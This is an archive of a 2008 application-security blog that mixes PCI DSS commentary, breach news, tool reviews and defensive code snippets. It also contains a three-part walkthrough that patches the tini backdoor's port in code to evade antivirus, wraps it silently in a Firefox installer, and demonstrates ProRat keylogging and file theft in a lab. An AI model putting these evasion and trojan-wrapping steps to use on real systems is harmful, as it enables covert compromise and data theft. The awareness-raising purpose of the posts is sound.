Tuesday, October 7, 2008

The security ninja has left the building

Well, as usual, things have happened much sooner than I had planned!

The new blog and forum went live over the weekend and now the new Security Ninja website is live. I'm happy with the way it looks at the moment and work is ongoing, but from today onwards I will not be posting to this blog anymore.

The Security Ninja website can be found here.

I look forward to seeing everyone on the new site!

Dave

Friday, October 3, 2008

News from the ninja

Hi everyone,

I just wanted to keep everyone up to date with what is going on with Security Ninja. I've been crazy busy with my company's annual PCI audit approaching, but of more interest to you guys are the changes coming to Security Ninja.

As I have been working away on the various tutorials I'm writing, I've realised the blog format isn't quite right to host everything I plan to produce. I love my blog and it's going to stay around, but Security Ninja is expanding to provide more than just a blog!

I have a few ideas which I plan to put on the new site: for example, I would like a wiki for application security, a security forum, a whitepapers section and a tutorial section. On top of that lot I will of course be keeping the blog going!

The new blog can be found here.

I plan on bringing the forum online over the weekend and the rest of the site over the next month.

If anyone has ideas for the new site then give me a shout on the blog or my cool new email address - securityninja at securityninja.co.uk :-)

Dave

Thursday, October 2, 2008

PCI version 1.2 released

Everyone who reads my blog or has spoken to me knows my feelings on the lack of real changes in the new version of the PCI DSS standard. Those feelings aside, I feel people should read the new version of the standard, available here.

For those of you who feel the standard is sufficient, or who don't understand my issues with it, I have listed three examples below that I feel it should address:

Virtualisation

Almost every company seems to be implementing virtualisation technologies within their infrastructure without understanding the new security issues this potentially raises. More and more researchers are attacking virtualisation technologies, which means more and more vulnerabilities will be found (for example, Blackhat USA07 had 2 presentations on virtualisation security issues compared to 20 at Blackhat USA08).

I think the standard needed to include specific requirements for this technology.

Cloud Computing

Maybe not such a hot technology right now, but it will continue to rise in popularity because of the low cost of ownership it can deliver. Cloud computing makes even virtualisation look expensive!

In the current economic climate companies will aim to save as much money as possible, and cloud computing will deliver serious savings. So what is my problem? With cloud computing you don't actually know where your data is - well, you know it's in the cloud...

I can't see how cloud computing can be PCI DSS compliant, but companies who need to be compliant may just go down this route. I get the feeling that before the next version of the standard is released this may become an issue the council needs to address.

Secure Application Development

Considering secure application development is my niche, I will always look for more on this particular topic. I have always had a problem with requirement 6.6 and I still do. I'm not really keen on the idea of using only a WAF (Web Application Firewall) instead of a really good secure development process. I don't care what the marketing departments of the WAF vendors say: you cannot prevent attacks such as CSRF (Cross Site Request Forgery) with these devices.
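To make the CSRF point concrete, here is a rough sketch of the kind of in-application defence a WAF can't replicate: a per-session secret token that a forged cross-site request cannot know. This is just my illustration (class and attribute names invented), assuming a standard Java servlet environment:

    import java.security.SecureRandom;
    import javax.servlet.http.*;

    public class CsrfToken {
        private static final SecureRandom RNG = new SecureRandom();

        // Called when rendering a form: store a fresh token in the session
        // and emit it as a hidden field that the browser will echo back.
        public static String issue(HttpSession session) {
            byte[] raw = new byte[16];
            RNG.nextBytes(raw);
            StringBuilder hex = new StringBuilder();
            for (int i = 0; i < raw.length; i++) {
                hex.append(String.format("%02x", raw[i]));
            }
            session.setAttribute("csrfToken", hex.toString());
            return hex.toString();
        }

        // Called on every state-changing request: a forged request carries
        // the victim's cookie but not the token, so it fails validation.
        public static boolean isValid(HttpServletRequest request) {
            String expected = (String) request.getSession().getAttribute("csrfToken");
            return expected != null && expected.equals(request.getParameter("csrfToken"));
        }
    }

The token travels in the page body rather than in a cookie, so the browser will not attach it automatically to a request forged from another site - which is exactly the check a WAF sitting in front of the application has no generic way to perform.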

Let me know what you think!

Dave

Thursday, September 25, 2008

My (IN)SECURE Magazine Article

Hi everybody,

The September edition of (IN)SECURE Magazine has been published and contains my article on Secure Web Application Development.

You can download the magazine here.

As always feedback is more than welcome!

My Burp Suite tutorial is still a work in progress; I have had a few requests to include more content than I originally planned, so hold tight everyone!

Dave

Saturday, September 13, 2008

Burp Suite Tutorial

Just a quick note to say the tutorial for Burp Suite is in progress.

I have been in contact with PortSwigger, the developer behind the Burp Suite, so the tutorial will have his input as well as mine.

Dave

Tuesday, September 9, 2008

SCADA system vulnerability and exploit code

For those of you who don't know what a SCADA system is, think core backbone systems for a country or countries: power grids, water systems and defense systems, to name just a few. A brief overview can be found here.

Often these systems run on very old platforms (Win 3.x and OS/2) which people are too scared to update. The defense has always been "oh, we don't connect these core systems to the internet so we are fine". That isn't always the case anymore; more and more SCADA systems are getting internet access, whether it is authorised or not. A penetration tester friend of mine recently told me how he was auditing a SCADA infrastructure that had 5 connections to the internet that had never been authorised. Normally I wouldn't have paid much attention, but these are systems which control almost everything we use and rely upon daily. Cyber warfare, anyone?

So why should I write this post now? Well, a recent vulnerability discovered by Core Security Technologies has had exploit code written for it, and that exploit code has been made available as a Metasploit module for anyone to download. I do not encourage any kind of unlawful hacking, but surely someone will take advantage of this and take something very important down?

I won't reproduce someone else's work, so here is the paper written by the exploit writer Kevin Finisterre.

As always if you have any questions or comments then fire away.

Dave

A few updates....

A big apology for the amount of time that has elapsed since my last post. Moving house took up more of my time than I had planned!

I'm now moved in and settled, so it's back to business as usual from today.

Whilst I have been away I have agreed to become a columnist at bloginfosec, and my first article should be posted in the next couple of weeks. I recommend that anyone who reads this blog also takes a look at the content over at bloginfosec.

Secondly, the article I have written for (in)secure magazine, which discusses secure web application development and integrating security into a development lifecycle, will be published this month. You can subscribe to the magazine for free at net-security.

Last but not least on the updates: OWASP have announced that an EU Summit will be held in Portugal this November to discuss many important issues! More information can be found here. I will be going along to the summit, so if any readers are going too then drop me a line and we can hook up.

I thought I would let you all know what content I plan to add to the blog in the coming weeks. Some of it is based on my own interests and some of it is based on the search queries that people are using to land on my little corner of the web!

Burp Suite Tutorial

Grendel Scan Tutorial

Metasploit Tutorial

Samurai Live CD Review

Backtrack 3 Review

SQL Ninja Tutorial

Those will be the more technical posts coming up in the short term. I will also be posting my usual comments on the news and security vulnerabilities.

Dave

Monday, August 25, 2008

Blackhat USA 08

The presentation materials are now available for the Blackhat USA 2008 conference, go and read them all :-)

Sorry for the lack of posts; I'm moving house in 2 days so it's all very hectic at the moment!

Dave

Tuesday, August 19, 2008

PCI DSS version 1.2

I have come across a document from the PCI DSS Council today which has a summary of the changes that will be included in the next version of the standard.

I will reserve my full opinion on the changes until I see the final version of the standard. I will say that if this document lists all of the changes, I'm a bit disappointed, as it doesn't even update requirement 6.5 to the latest OWASP Top Ten...

I will post more when the final version of the standard is released.

Thursday, August 14, 2008

Application Security Testing Tools

I have been asked a few times recently to tell people what tools I use when I'm testing web applications for security issues.

I always find that a mixture of tools can be used to find potential security issues in applications, but exploiting those issues always seems to be a manual effort. I don't mind that; I get a good feeling when I hack things!

I will list the tools I use along with a short description. I'm not writing this post as a tutorial - if anyone wants tutorials then let me know and I will see what I can do.

My favourite tool would be the Burp Suite from PortSwigger. We have recently purchased a site license at work - I think that says a lot for this tool. Burp Suite offers many different modules that can help you test application security. I like the Intruder module the most; it allows me to input the strings I would use in manual tests very quickly and in a few different ways. My test inputs file contains nearly 400 different inputs, so the Intruder module is a lifesaver. The Burp Suite is available as a free or commercial tool, and I recommend that anyone interested in web application security testing grabs a copy and has a play with it.
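For anyone wondering what the Intruder module actually automates, the core idea boils down to something like the sketch below: take each test input, substitute it into a target parameter and flag suspicious responses. The URL, parameter and error signature are all invented for illustration - the real Intruder does far more (multiple insertion points, encodings, response analysis and so on):

    import java.io.*;
    import java.net.*;

    public class MiniIntruder {
        public static void main(String[] args) throws Exception {
            // inputs.txt: one test string per line (XSS, SQLi payloads, etc.)
            BufferedReader payloads = new BufferedReader(new FileReader("inputs.txt"));
            String payload;
            while ((payload = payloads.readLine()) != null) {
                try {
                    // Substitute the payload into the target parameter
                    URL url = new URL("http://test.example.com/search?q="
                            + URLEncoder.encode(payload, "UTF-8"));
                    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
                    BufferedReader in = new BufferedReader(
                            new InputStreamReader(conn.getInputStream()));
                    StringBuilder body = new StringBuilder();
                    String line;
                    while ((line = in.readLine()) != null) {
                        body.append(line);
                    }
                    in.close();
                    // Crude checks: payload reflected unencoded, or a database
                    // error string in the response - both deserve a manual look
                    if (body.indexOf(payload) >= 0 || body.indexOf("SQL syntax") >= 0) {
                        System.out.println("Possible issue with payload: " + payload);
                    }
                } catch (IOException e) {
                    System.out.println("Error response for payload: " + payload);
                }
            }
            payloads.close();
        }
    }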

The Burp Suite can also be extended using the IBurpExtender interface; if any developers reading this want to collaborate on a project then drop me a line. I have a few ideas that I would love to implement using it.

I have recently started playing with the Exploit-Me Firefox plugins and I have been impressed by them. I have put SQL Inject Me and XSS Me into my testing toolbox. The plugins allow you to "point and click" test web applications for XSS and SQL Injection issues. They are quick and efficient and I would recommend them to anyone wanting to test for these issues.

I have recently started to try some fuzz testing tools when I have been testing web applications. This approach has found a lot of bugs in high profile software in the past so I felt it was worth a try.

I had started using Spike Proxy for fuzzing but, if I'm honest, I'm not that impressed with the tool. I felt the initial character set that is hardcoded into the tool wasn't as big as I would like. I extended this significantly, but I'm still not likely to stick with the tool: I wanted the fuzzer to put random data of random lengths into fields, and it didn't deliver that for me. Perhaps I'm using it incorrectly; if so, drop me a line and enlighten me :-)

So, to fulfil my desire for a fuzzing tool, I have begun playing with JMeter. I think if I write some Java with a predefined character set (it could even pull from a "random" source - /dev/random?) and an upper and lower length for the input, I can use BeanShell with JMeter to feed this fuzz-type data into the fields I submit to the web application. I can't take all of the credit for the idea; if the person who helped with it is reading this now, thank you very much! It is still very much in the "does it actually work?" stage, so I will let you all know how it goes.
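To give you a flavour of the idea, the sketch below is the sort of thing I mean - BeanShell dropped into a JMeter PreProcessor, building a random-length string from a character set and exposing it to the sampler. The character set and length bounds are just placeholders, and I haven't proven this out yet:

    // BeanShell PreProcessor sketch: build a random-length random string
    // and expose it as ${FUZZ} for the HTTP sampler to submit.
    // "vars" is supplied by JMeter.
    import java.util.Random;

    String charset = "abcdefghijklmnopqrstuvwxyz0123456789'\"<>%;()-"; // placeholder set
    int minLen = 1;     // placeholder lower bound
    int maxLen = 1024;  // placeholder upper bound

    Random rnd = new Random();
    int len = minLen + rnd.nextInt(maxLen - minLen + 1);
    StringBuffer sb = new StringBuffer(len);
    for (int i = 0; i < len; i++) {
        sb.append(charset.charAt(rnd.nextInt(charset.length())));
    }
    vars.put("FUZZ", sb.toString());

Every sampler that references ${FUZZ} would then get a fresh random value on each iteration.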

That's my main set of testing tools at the moment, but I'm always playing with new things. I have a few tools listed below that I think are going to be squeezing into my testing toolbox soon (not all of these are new tools):

Grendel-Scan

Nikto

Wikto

Try them and find out what works for you.

Dave

Up in the clouds......

With all the discussion of cloud computing recently I have decided to give it a go. I'm going to sign up with the Amazon cloud service.

Since I created this blog I'm finding I need bigger and better labs to test out things like the Dan Kaminsky DNS flaw, Evilgrade and a multitude of reverse engineering tasks. I have decided that doing all of this up in the Amazon cloud gives me a huge amount of computing power for a very small price.

I'm going to get myself set up in the next few days - expect some good lab work to appear on the blog in the coming months!

Dave

Monday, August 11, 2008

Security/Hacking conferences

With all the talk of Blackhat USA and Defcon at the moment, I wish I had gone along! I have a lot of friends over in Las Vegas right now telling me about the fun they are having. I look forward to reading the presentations from the conferences.

Next year I will be going! I will also be making my usual journey to Blackhat Europe in 2009. It seems like a long way off, but Blackhat Europe will be hosted in Amsterdam as usual and will run from April 14th through to the 17th next year. Details will be posted on this page.

I also plan on visiting the Chaos Communication Congress this December; it will be held on the traditional days of the 27th - 30th. I think I really need to pick my time carefully when I tell my girlfriend I plan on going! More details can be found here.

I will post more about Blackhat nearer the time but if anyone else is planning on going to CCC give me a shout.

Dave

Monday, July 28, 2008

An apple a day.......

Should keep the doctor away. Unless it's an OS X install acting as a DNS server, in which case this apple a day will get you owned.

In case you have been living on the moon and have missed the huge number of news stories about the serious issue discovered in every DNS implementation, please read this.

It appears that Apple are one of the few major vendors who have not released a patch, and according to Heise Security they haven't even issued any security alerts. I'm not an anti-Apple person - I own a MacBook and an iPod Touch - but over the years they haven't been great at security and patching. Steve Jobs might be right about Microsoft lacking taste and design ideas, but they sure do kick Apple's ass when it comes to patching and patch scheduling.

This DNS issue had been bubbling away for a couple of weeks until Halvar Flake figured out the problem. DYOR (Do Your Own Research) on the whole story, but the issue has got much worse with the release of a Metasploit module and Evilgrade, both of which exploit it.

As soon as I get the chance I will give a demo of either the Metasploit modules or Evilgrade - probably Evilgrade, as I like the look of that!

Dave

76% of US Banking websites insecure

I came across a study today, written by Laura Falk, Atul Prakash and Kevin Borders from the University of Michigan, which explains that of the 214 US banking sites reviewed, 76% have security holes.

The report focuses on security issues that have occurred because of poor design decisions in the development of the banking sites. I like this approach because it demonstrates that security compromises don't just occur through obscure or fancy attacks.

Some of the issues highlighted are things that I would suggest are obvious design flaws such as beginning a logon session from an HTTP page.

I would suggest that anyone with an interest in secure web application development should have a read of this report. My article in the next edition of (IN)SECURE Magazine will give you tips on how to avoid these types of design issues.

Dave

Tuesday, July 15, 2008

Views on the news

I have come across a few news stories I wanted to share with you all today, so instead of having multiple posts I thought I would address them all here.

I nearly didn't read the first news story, but I'm glad I did. Moodle is a course management portal used by universities and the like across the world. The story explained how the portal has two vulnerabilities: an XSS (Cross Site Scripting - not really a "wow") but also a CSRF (Cross Site Request Forgery). The CSRF really interested me, and I now have something to point to for my colleagues who have listened to me talking about this issue for a while now.

I won't explain CSRF here (details can be found here), but the attack itself tricked users into clicking on a link which sent an edit profile request on their behalf, leading to a compromise of the user's account.

The second story explains how three quarters of UK companies have banned IM within their infrastructure. The story states that only 88% of the IT directors surveyed felt IM posed a security risk - oh dear. Personally I would ban public IM (MSN, Yahoo etc) for all users; in fact I would go one step further and remove web access completely for certain business units. If a business unit has access to sensitive data then, in my opinion, the systems in that business unit should not have web access. The sensitive data could be credit card data, or Intellectual Property such as source code - anything sensitive and of high value to the business, really.

I'd like to hear the opinions of other people on this.

Just one more to go, a more technical story.

The last one is from SANS ISC; have a read and let me know what you think.

Dave

The dataloss database

I often struggled to find the statistics I required for presentations on data breaches until I found attrition.org.

I liked attrition, but I love what it has evolved into! I got an email on the Full Disclosure mailing list today announcing its change to the DataLossDB. The Open Security Foundation will be running the DataLossDB, and I for one look forward to using it!

Basically, it is a central DB of all public data breaches from the past 8 years. There are many ways to search the data, and monthly and annual reports can be viewed by anyone.

I have to say the guys at OSF have done a great job with this!

Dave

Thursday, July 10, 2008

2600, first the magazine now the book!

2600 magazine has been around since 1984 and I always look forward to my copy being delivered. I was happy to read that they are releasing a book with all of the best bits from 1984 through to 2008.

I think it will be a great read; I bet the early editions talked about topics such as blue boxing, right through to the early/mid nineties when the internet exploded into the beast we know today. I can't wait!

More details can be found here: 2600 book

And yes, I have pre-ordered mine ;-)

Dave

Tuesday, July 8, 2008

Part 3 - using the wrapped ProRat Trojan

Well, I have finally managed to get part 3 written. My initial intention was to use the modified tini.exe that we installed in part two, but I changed my mind. Parts one and two are still fully relevant; you need to have read part two to understand part 3 fully.

I decided to use a trojan that has far more "eye candy" than tini and netcat: a trojan called ProRat, which I used to tinker about with in the past. I think it will really highlight why parts one and two were important to know.

First, as usual, the actors:


I have used two Windows XP virtual machines (safety first, kids) for this demonstration; both the victim and attacker hosts are shown below:



I have downloaded and opened the ProRat command software on the attacker machine, as shown below:


The first thing I need to do is create the server. The server in ProRat is actually the piece of software you wish to install on the victim's machine. I chose a random port for my server, port 8668. I have included a few screenshots below showing the wide range of options available to the attacker when he is creating the server:








Some of those options, especially in the first image, are pretty serious attacker options - for example, disabling the firewall and antivirus...

I wrapped the ProRat server up with the Firefox installer (see part two of this series for more information) and installed it on the victim's machine. I have included before and after netstat -na outputs below:



I connect to the server through the ProRat command console:


I think it's time for some fun; let's have a play with some of the tools available to us. As you can see, the command console offers lots of tools to extract information from, or do even more damage to, the victim. I have selected just a few of these to demonstrate in this post.

I have included screenshots of a few of these tools in action. Firstly, taking screenshots of the victim's desktop:


Viewing the applications the victim is running:


Viewing the web history:


I have just three more examples I would like to show you in this post. Firstly, copying the victim's clipboard. I have entered some text into Notepad on the victim's computer:


And I have accessed this through the command console:


Second, stealing files from the victim's machine. The victim has a file called mypasswordsfile.txt:


And I have copied this to the command console:


Just one more to show: the keylogger. Without needing any prompting from me, the ProRat server has been sending all of the victim's keystrokes back to the command console, as shown below:


Well, that is all really. I think we can all now see how easy it can be to get powerful, malicious software onto an unsuspecting victim's machine.

Don't have nightmares; the next technical post will explain how to steal data and hide it covertly within TCP packets.

Dave

PS - all stunts are performed by highly trained security ninjas; do not attempt to perform these stunts in your own home.

Monday, July 7, 2008

Exploit-me tools

I have been using a few new tools recently to help automate my XSS and SQL injection testing and I thought I would share them with you.

My normal approach involved manual work along with the Burp Suite (using the Intruder function) with a list of inputs loaded in. Then I came across the Exploit-Me tools from Security Compass, and I thought I would tell you guys about them.

I won't talk too much about how to use the tools; I think installing them and having a play will tell you all you need to know. The link above to the Security Compass website has some FAQs/usage guides, along with a presentation given at the SecTor conference. XSS-Me comes pre-loaded with RSnake's XSS cheat sheet inputs; these can be expanded with strings from your own brain or from many web sources. SQL Inject Me is similar in that it comes pre-loaded with some strings, and again the list can be extended. Lastly, the Access-Me tool aims to exploit access control flaws within an application.

Have a play with the tools and let me know what you think.

Dave

(in)secure magazine article

Hi everyone,

I will be writing an article for the next edition of (in)secure magazine on secure web application development.

I plan on explaining why we need to develop securely and what kinds of approaches can be taken to ensure secure development takes place, and then giving general tips based on my own experience.

When the next edition is released I will post a link to it here.

Dave

I'm back!

I flew back to Ireland this morning from the British Grand Prix; as a Ferrari fan, it turned out to be a disappointing race for me. Arguably the team hasn't been this poor since the pre-Schumacher days of the 80s and early 90s. Hopefully things will be better when I fly to the home of Ferrari F1 racing in September.

I will be working on post 3 in the series over the next day or two, so watch out for that. Because of Niall's comment last week about antivirus products I want to take a different approach to the one I had originally planned, so stay tuned!

Wednesday, July 2, 2008

Citibank ATM's hacked

I came across an interesting story today which explains how the Citibank ATMs in over 5,000 7-Eleven stores have been hacked.

It is estimated that the hackers have stolen around $2 million from this hack. That is of course no small amount of cash, but that's not what caught my attention. All that's known is that the hackers broke into the ATM network through a server at a third-party processor, which means they probably didn't have to touch the ATMs at all to steal the PINs. The PINs were passed in the clear from the ATM through to the backend system. This is about all the information that has been made public so far; as soon as I hear any more I will post it here.

This is clearly a new way to steal PINs, and one which would show absolutely no signs to the ATM user. Previously, security professionals would tell users not to enter their PIN into links followed from phishing emails. We would also tell people about false fronts on ATMs designed to steal your data, but this is completely different: the end user would have had no idea that this was going on.

More and more ATMs are running on the Windows operating system, apparently on a range of versions from Windows 98 through to Windows XP. I have an example of an ATM running Windows NT below:


And a second image I like is shown below; it's a Russian ATM running a pirated version of Windows XP:


Dave

Tuesday, July 1, 2008

Wrapping a backdoor with a genuine installer

Well, I have been able to get this posted much quicker than I thought. In short, I will be wrapping dave.exe from part one up with the genuine installer for Firefox 3.0.

This will install Firefox and also my backdoor silently on the machine.

Here we go, the actors:


Once I have launched Elitewrap I have to define the output filename. This is the name of the wrapped .exe.


Once this has been defined you have to select the operation you want Elitewrap to perform.


The readme file lists all the options with explanations, but I will be using operation 3. This will install my backdoor silently whilst the Firefox installer runs in the foreground.

And so to wrap the exes; there is nothing really complicated to it, as you can see below:


And here is the output:


Before I run this executable I have run the netstat -na command to show the backdoor isn't already running (it will be on port 39846):


So I double-click the exe and here is the output (including an updated netstat):




So we can see that the backdoor is already listening and we haven't even installed Firefox yet. Even if we were to cancel the installation, it's too late.

We continued the installation and allowed it to finish:


And the final result is shown below:


Firefox installed without any hint of a problem and my backdoor is waiting for me to connect.

I hope that this post has been informative, contact me or leave a comment if you have any questions.

Update: based on Niall's comment I have uploaded the wrapped firefox.exe to Virus Total and the results are shown below:


For part three of this series I will be using something a bit more industrial than dave.exe. All will be revealed soon!

Dave

Monday, June 30, 2008

Part two nearly here.....

With a bit of my OWASP work complete, I thought I would put part two of this post up. I decided to video the whole thing; it was my first time and I have had nothing but trouble with it. The video was nearly 100MB so it took ages to upload, and when it finally did, the quality was terrible - it looked great locally.

I will just post up screenshots tomorrow like I did for the first bit of the post. I will sort this out tomorrow night, so only one more day to wait. If I get the video uploaded and looking good I will add that in.

If I had more time I'd get it sorted properly but I fly out to the British Grand Prix on Thursday morning and I'd like to get it posted before I depart.

Dave

Friday, June 27, 2008

Bypass modern anti virus with an 8 year old backdoor

This is the first of a 3-part blog entry - well, blog entry/warning/tutorial; pick whichever you think fits best. As soon as people find out I work in IT security, the first question I'm normally asked is which is the best antivirus product to use. Normally I just name one of the big providers - F-Secure, Symantec etc. - but I do also state that they aren't a silver bullet.

What I'm going to do first in this 3-part blog is download tini.exe, a backdoor roughly 8 years old, and submit it to Virus Total, where it will be scanned by 33 different antivirus products; I will show the results. Then the fun bit: I will modify just the port that tini.exe listens on, and its name, then see how many still report it as a backdoor!

Secondly I will show you how to wrap this backdoor into any application you want and have it install silently along with the real application. The third step will be a demonstration of a second machine connecting to this backdoor.

First, download the tini installer. I will submit the default tini.exe backdoor to Virus Total and see how many of the modern antivirus products detect this old backdoor.



Almost all of the products have figured out that it is some kind of backdoor/trojan.

So now to crack tini open with a hex editor and find the default port value, 7777 in this case:


Now I have picked a random port, 39846 (0x9ba6), and I will edit the backdoor as shown below:
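If you would rather script the edit than click around in a hex editor, something along the lines of the sketch below would do the same job. It assumes the port is stored as a little-endian 16-bit value (7777 = 0x1E61, 39846 = 0x9BA6) and patches only the first match, so treat it as an illustration rather than a robust binary patcher; the file names are just examples:

    import java.io.*;

    public class PortPatch {
        public static void main(String[] args) throws IOException {
            // Read the original backdoor into memory
            File input = new File("tini.exe");
            byte[] data = new byte[(int) input.length()];
            DataInputStream in = new DataInputStream(new FileInputStream(input));
            in.readFully(data);
            in.close();

            // 7777 = 0x1E61 -> bytes 61 1E; 39846 = 0x9BA6 -> bytes A6 9B
            for (int i = 0; i < data.length - 1; i++) {
                if (data[i] == (byte) 0x61 && data[i + 1] == (byte) 0x1E) {
                    data[i] = (byte) 0xA6;
                    data[i + 1] = (byte) 0x9B;
                    break; // patch the first match only
                }
            }

            // Write out the renamed, re-ported backdoor
            FileOutputStream out = new FileOutputStream("dave.exe");
            out.write(data);
            out.close();
        }
    }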


I saved the modified version as dave.exe and I will re-submit this to Virus Total. The results are shown below:



You can see that only 21 of the products now report this file as being malicious. So, just by changing the listening port and the name of the backdoor, detection of this 8-year-old backdoor dropped to 21/33 products (the first scan was 32/33). It is hardly inspiring reading, is it?

Part two of this post will show you how to wrap this modified backdoor with a genuine application in order to install it stealthily on the victim's machine.

Please be patient waiting for part two; I have commitments to meet for the OWASP Code Review Guide over the next few days before I can put it up.

Sunday, June 22, 2008

Interview with the developers of Backtrack

I have been listening to episode 112 of the PaulDotCom podcast (PaulDotCom) and it contains a fantastic interview with the guys behind the BackTrack distribution.

I highly recommend this podcast to existing and new BackTrack users alike.

The guys talk about where the distribution came from, some of the problems they have faced, some of the tools in the latest version and plans for the future.

The BackTrack distribution can be found here: BackTrack

Dave

Friday, June 20, 2008

Virgin Media data breach

What is it with 2008 and companies losing data on CDs?

The latest company to lose data this way is Virgin Media; they have lost an unencrypted CD containing the bank account details, names and addresses of 3,000 customers.

More information can be found here: Virgin Media data loss

What more can I say? It's Friday night - maybe I will come back and add a rant to this post tomorrow :-)

Dave

Monday, June 16, 2008

Secure Development - preventing Cross Site Scripting

Hi everyone, I have included a Google Docs reader below for a paper I have written on Cross Site Scripting. The paper discusses the three types of Cross Site Scripting attack, along with code examples and the associated fixes.

The paper can be viewed here:

Preventing Cross Site Scripting

The formatting has been messed up a bit by Google Docs, but I hope it makes sense to everyone.
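In case Google Docs has chewed up the code samples too, the core fix the paper describes boils down to encoding untrusted data before it is written into a page. A bare-bones illustration of the idea (not the exact code from the paper):

    // Encode the handful of HTML metacharacters so user input is rendered
    // as text rather than being interpreted as markup or script.
    public static String htmlEncode(String input) {
        if (input == null) return "";
        StringBuilder out = new StringBuilder(input.length());
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

With this in place, a <script> tag submitted in a comment field comes back as &lt;script&gt; and renders harmlessly.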

Sunday, June 15, 2008

PCI 6.6 mandatory compliance date looming

When I first read PCI DSS v1.1, requirement 6.6 caught my eye for two reasons: I could see the potential security benefits, but also the extra work I would have to do!

Requirement 6.6 is shown below:

Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:

• Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
• Installing an application layer firewall in front of web-facing applications.

Note: This method is considered a best practice until June 30, 2008, after which it becomes a requirement.


Wow, all custom code externally reviewed - time to save up the pennies to pay for that! A lot of the community were scratching their heads trying to figure out whether this actually means having every line of custom code reviewed; even as a relatively small company, we were a bit worried about the cost. Fortunately, the PCI Council released a clarification document earlier this year detailing the approaches by which a company could meet 6.6:

"The application code review option does not necessarily require a manual review of source code.

Keeping in mind that the objective of Requirement 6.6 is to prevent exploitation of common vulnerabilities (such as those listed in Requirement 6.5), several possible solutions may be considered.

They are dynamic and pro-active, requiring the specific initiation of a manual or automated process. Properly implemented, one or more of these four alternatives could meet the intent of Option 1 and provide the minimum level of protection against common web application threats:

1. Manual review of application source code
2. Proper use of automated application source code analyzer (scanning) tools
3. Manual web application security vulnerability assessment
4. Proper use of automated web application security vulnerability assessment (scanning) tools"


We felt that our current approach towards secure application development and code reviews met the intent of the first option in requirement 6.6. We have had an external company specialising in auditing and application security review (and produce a report on) our process.

I would love to know what kind of approach others have taken to satisfy requirement 6.6.

Remember folks, it becomes mandatory in 15 days so act fast!

Even more documents lost....

Following on from my post last week, which discussed the loss of Top Secret government documents, a second breach has been hitting the headlines.

I was amazed that these kinds of documents were left on a train once, but for it to happen twice is beyond belief. Several of the statements made by government officials and in news reports grabbed my attention. Firstly:

"His work reportedly involves writing and contributing to intelligence and security assessments, and he has the authority to take secret documents out of the Cabinet Office - so long as strict procedures are observed."

So the government actually allows Top Secret (national security) documents to be printed and taken off its premises. As a security professional my first reaction was one of surprise, until you consider the major security blunders by the UK government in the past 12 months.

Secondly, a comment made by Keith Vaz, Chairman of the Home Affairs Select Committee:

"no official no matter how senior, should be allowed to take classified or confidential documents outside their offices for whatever reason."

That seems a good enough start in my opinion. But this really does come back to the very last point I made in my original post last week about printed data.

It is one of my biggest professional fears: how do I know people aren't printing sensitive data off and stuffing it into their pockets? As a financial services company we get emails every week from individuals and banks (yes, banks) which contain unencrypted sensitive data. Fortunately we have well-defined procedures and skilled staff to respond correctly to these emails. But what if we didn't?

In terms of technical controls we can manage the risk of theft around this data, but once it is printed all bets are off. A user could just print the email; if we prevent printing, they could do a screen print; they could even write it down and away they go. In this day and age of mobile phones with high-resolution cameras, what is to stop people just taking a picture of the data and taking it that way?

When you think of it like this you may feel a bit of sympathy for the government, but they have the budgets and the ability to hire the top talent to prevent these breaches.

Wednesday, June 11, 2008

Security, is it really that hard?

I read and hear about security breaches almost everyday and I always ask myself the same question, "is security really that hard?".

Today I have read two articles on the BBC website: one (BBC Article 1) is about even more credit card numbers being lost, and the second (BBC Article 2) is about more confidential UK government documents being lost.

Cotton Traders have lost 38,000 credit card numbers through their website. No technical details of the breach have been given, but it's likely to have been a SQL Injection attack. The article on the BBC doesn't give much information away. What it does give away is false information about the TK Maxx data breach in 2007: the article falsely stated that the TK Maxx breach occurred through their website.

TK Maxx (more precisely TJX) didn't lose their card numbers through their website. The breach occurred because someone noticed that the TK Maxx stores used WEP to protect their internal POS networks. Through war driving they cracked the WEP (not a highly technical hack) and went on to take close to 100 million card numbers over 18 months. For such a big news company I would have expected a more accurate report from the BBC.

Back to the original point, the Cotton Traders breach. Many sites are vulnerable to SQL Injection (again, this is my assumption), so only half a scowl for them on that. But cleartext card data - that's not really forgivable. If I were investigating the breach my two main questions would be: 1) Did you need to store that data? and 2) Why didn't you store it securely (i.e. encrypted)? I'm sure we will never publicly know the answers.
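Since I'm assuming SQL Injection was the way in, it's worth showing the standard fix: never build SQL by concatenating user input, use bound parameters instead. A quick sketch (table and column names invented for the example):

    import java.sql.*;

    public class SafeQuery {
        public static ResultSet findOrders(Connection conn, String customerId)
                throws SQLException {
            // The user-supplied value is bound as a parameter, never
            // concatenated into the SQL string, so input such as
            // ' OR '1'='1 is treated as data rather than as SQL.
            PreparedStatement ps = conn.prepareStatement(
                    "SELECT * FROM orders WHERE customer_id = ?");
            ps.setString(1, customerId);
            return ps.executeQuery();
        }
    }

And on the storage question, the answer is the same as it has always been: if you genuinely need to keep card data, it has to be encrypted at rest.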

My last point on Cotton Traders is that the breach occurred in January, 6 months ago. The sooner we see more laws like California's SB 1386 the better! The public should be made aware of such breaches sooner; just think how many are probably going unreported.

The second article focuses on the fact that the UK government has lost more information. This time a government official has left printed copies of Top Secret documents on Al Qaeda and the war in Iraq on a train. A police investigation is being conducted, and I'd suggest that some poor employee who may not have known better will be receiving their P45 soon. I could write all night about the potential problems that caused this loss of data, but I won't!

At a recent Data Privacy seminar we were all unanimous in our fear of printed data. We can have all the latest and greatest firewalls, IPS/IDS, encryption etc, but once it's on paper what can you do?

Dave

Monday, June 9, 2008

How safe is hackersafe?

A lot of websites now display the hackersafe logo. I've always wondered what this actually means for a website - what do they check, etc.?

Well, today I got a phishing email and I followed the link to see who had been exploited this time. The phishing site was being hosted a few directories deep on the webserver, so I backed up to the homepage (away from the phishing site to the "real" site), only to be greeted by the lovely hackersafe logo. The logo proudly proclaimed that the site was hackersafe - certified today!

Obviously the site isn't hackersafe. So what does this mean? Is this a security company providing an inferior service, spreading FUD and providing no real security? My opinion would be maybe: potentially there is a need for this kind of service, but in my opinion hackersafe does not provide what its clients believe it does.

